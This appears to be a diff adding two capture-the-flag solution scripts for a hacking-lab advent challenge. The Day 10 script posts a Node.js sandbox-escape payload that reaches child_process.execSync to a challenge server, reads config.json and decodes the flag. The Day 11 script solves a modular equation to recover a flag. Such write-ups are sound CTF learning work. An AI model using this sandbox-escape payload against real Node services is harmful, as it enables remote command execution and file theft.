Day 10 + 11

Day 10/decode.py

@@ -0,0 +1,27 @@
+#!/usr/bin/python
+
+import urllib.request
+import urllib.parse
+import json
+
+class Payload(object):
+    def __init__(self, j):
+        self.__dict__ = json.loads(j)
+    def get(self, key):
+        return self.__dict__[key]
+
+code = 'new Function("return (this.constructor.constructor(\'return (this.process.mainModule.constructor._load)\')())")()("child_process").execSync("cat ./config.json")'
+url = "http://whale.hacking-lab.com:3000/run"
+data = urllib.parse.urlencode({"run": code}).encode()
+request = urllib.request.Request(url, data=data)
+response = urllib.request.urlopen(request).read()
+
+p = Payload(response)
+result = p.get("result")
+
+indexStart = result.find("[") + 1
+indexEnd = result.find("]")
+result = ''.join([chr(int(x.strip())) for x in result[indexStart:indexEnd].split(",")])
+
+p = Payload(result)
+print(p.get("flag"))

Day 11/decode.py

@@ -0,0 +1,42 @@
+#!/usr/bin/python
+
+import math
+
+def linear_diophantine_equation(a, b):
+    if b > a:
+        return linear_diophantine_equation(b, a)
+
+    if b == 0:
+        return a, 1, 0
+
+    d, x, y = linear_diophantine_equation(b, a % b)
+    return (d, y, x - (a // b) * y)
+
+# c = (a * b) % p
+c = 0x7E65D68F84862CEA3FCC15B966767CCAED530B87FC4061517A1497A03D2
+p = 0xDD8E05FF296C792D2855DB6B5331AF9D112876B41D43F73CEF3AC7425F9
+b = 0x7BBE3A50F28B2BA511A860A0A32AD71D4B5B93A8AE295E83350E68B57E5
+
+def test_solution(a):
+    return (a * b) % p == c
+
+d, x, y =  linear_diophantine_equation(b, p)
+
+a = y * c
+a += abs(a // p) * p
+solution = hex(a).replace("-", "")[2:]
+
+# print(p/b)
+
+while len(solution) != 2*29:
+    a += p
+    solution = hex(a).replace("-", "")[2:]
+    if not test_solution(a):
+        print("Not a valid solution")
+        exit()
+
+    ascii = ''.join([chr(int(solution[i:i+2],16)) for i in range(0, len(solution), 2)])
+    if ascii[0:4] == "HV18":
+        print(hex(a))
+        print(ascii)
+        break